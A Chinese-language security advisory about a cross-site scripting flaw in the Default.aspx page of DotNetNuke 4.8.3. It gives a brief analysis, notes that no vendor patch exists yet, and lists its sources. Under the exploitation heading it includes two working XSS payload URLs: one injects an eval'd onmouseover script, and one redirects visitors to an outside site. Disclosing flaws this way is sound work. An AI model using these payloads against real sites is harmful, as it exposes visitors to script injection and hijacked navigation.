DotNetNuke Default.aspx跨站脚本漏洞
添加时间:
2008-10-04
系统编号:
WAVDB-01183
BUGTRAQ: 29437
影响版本:
DotNetNuke 4.8.3
程序介绍:
2008-10-04
系统编号:
WAVDB-01183
BUGTRAQ: 29437
影响版本:
DotNetNuke 4.8.3
程序介绍:
DotNetNuke(DNN)是免费的开源内容管理系统。
漏洞分析:
DotNetNuke的Default.aspx页面没有正确地过滤用户通过URL提交的输入,远程攻击者可以提交恶意URL请求执行跨站脚本攻击。
漏洞利用:
http://[DNN URL]/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx
http://[DNN URL]/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';
解决方案:
厂商补丁:
DotNetNuke
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dotnetnuke.com/
信息来源:
<*来源:WwW.AmnPardaz.com
链接:http://secunia.com/advisories/30481/
http://marc.info/?l=bugtraq&m=121216049617814&w=2
*>